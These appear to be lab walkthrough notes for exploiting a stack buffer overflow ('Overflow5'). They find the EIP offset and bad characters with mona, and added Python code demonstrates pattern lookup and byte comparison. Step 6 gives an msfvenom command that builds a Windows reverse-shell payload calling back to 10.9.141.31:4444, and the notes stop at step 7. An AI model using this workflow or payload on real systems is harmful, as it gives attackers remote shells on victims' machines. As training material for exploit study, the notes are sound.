Overflow5

1. Fuzz the application to find the number of bytes needed to crash it

Bytes needed to crash application: 400

2. Set mona configuration

!mona config -set workingfolder c:\mona\%p

3. Find the EIP offset (send the 400-byte cyclic pattern in place of the fuzz buffer, then ask mona which part of it landed in EIP)

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 400

!mona findmsp -distance 400

EIP offset: 314
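How the offset of 314 is derived, as an added example that is not part of the original notes: the cyclic pattern is a sequence of unique 3-byte triples, so the 4 bytes found in EIP after the crash identify exactly one position in the buffer. The EIP value 0x356b4134 used below is a constructed sample (the little-endian reading of the pattern bytes at offset 314 of a 400-byte pattern), not a value from the page.

```python
# Added example, not the page's own code: a Metasploit-style cyclic pattern
# (pattern_create.rb) and the lookup that !mona findmsp performs on EIP.
import string

def pattern_create(length: int) -> bytes:
    """Return the first `length` bytes of the pattern Aa0Aa1...Aa9Ab0... (upper, lower, digit)."""
    if length > 26 * 26 * 10 * 3:
        raise ValueError("pattern would repeat beyond 20280 bytes")
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])

def pattern_offset(pattern: bytes, needle: bytes) -> int:
    """Offset of `needle` inside `pattern`, or -1 if it does not occur."""
    return pattern.find(needle)

def eip_offset(pattern: bytes, eip: int) -> int:
    """EIP holds the four overwriting bytes in little-endian order, so reverse them before searching."""
    needle = eip.to_bytes(4, "little")
    return pattern_offset(pattern, needle)

if __name__ == "__main__":
    pattern = pattern_create(400)
    crashed_eip = 0x356B4134  # constructed sample crash value: bytes "4Ak5"
    print("EIP offset:", eip_offset(pattern, crashed_eip))  # 314
```

The same lookup works for any register or stack value mona reports, which is why `findmsp` can also tell you how far past EIP the pattern continues.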

4. Find bad characters (a bad byte can corrupt everything sent after it, so exclude one at a time, regenerate the array and compare again)

!mona bytearray -b "\x00"

!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP address>

Bad characters: \x00\x16\x2f\xf4\xfd
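What `!mona compare` does with the byte array and the copy found at ESP, as an added example that is not part of the original notes: it walks both buffers and reports the first byte that differs or is missing. The `simulated_target` function is a constructed stand-in for sending a buffer and reading it back from memory (it rewrites 0x16 to 0x00 and truncates at 0x2f); it does not model the application from the page, whose bad characters are listed above.

```python
# Added example, not the page's own code: the comparison behind !mona compare,
# driven iteratively because one bad byte can mangle every byte after it.

def bytearray_without(excluded: bytes) -> bytes:
    """Every byte value 0x00..0xff minus the ones already known to be bad (!mona bytearray -b)."""
    return bytes(b for b in range(256) if b not in excluded)

def first_divergence(sent: bytes, observed: bytes):
    """Return (index, sent_byte, observed_byte) for the first mismatch, or None if memory matches."""
    for i, b in enumerate(sent):
        if i >= len(observed):
            return (i, b, None)          # buffer was truncated at this byte
        if observed[i] != b:
            return (i, b, observed[i])   # byte was rewritten in memory
    return None

def find_bad_chars(send_and_read, known_bad: bytes = b"\x00", max_rounds: int = 256) -> bytes:
    """Exclude one bad byte per round until the buffer read back matches the buffer sent."""
    bad = bytes(known_bad)
    for _ in range(max_rounds):
        sent = bytearray_without(bad)
        observed = send_and_read(sent)
        div = first_divergence(sent, observed)
        if div is None:
            return bad
        bad += bytes([div[1]])
    raise RuntimeError("too many rounds; target is not reproducing the buffer")

def simulated_target(buf: bytes) -> bytes:
    """Constructed stand-in for 'send buffer, read ESP': 0x16 becomes 0x00, 0x2f ends the copy."""
    out = bytearray()
    for b in buf:
        if b == 0x2F:
            break
        out.append(0x00 if b == 0x16 else b)
    return bytes(out)

if __name__ == "__main__":
    found = find_bad_chars(simulated_target)
    print("bad characters:", "".join(f"\\x{b:02x}" for b in found))  # \x00\x16\x2f
```

Against a real target `send_and_read` would send the byte array and return the bytes copied out of the debugger at the ESP address; the loop then reproduces the exclude-regenerate-compare cycle of steps 4's two mona commands.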

5. Find a jmp esp instruction whose address contains none of the bad characters

!mona jmp -r esp -cpb "\x00\x16\x2f\xf4\xfd"

Return address: 0x625011af

6. Generate shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=10.9.141.31 LPORT=4444 EXITFUNC=thread -b "\x00\x16\x2f\xf4\xfd" -f c

7. Put a NOP sled in the padding ahead of the shellcode
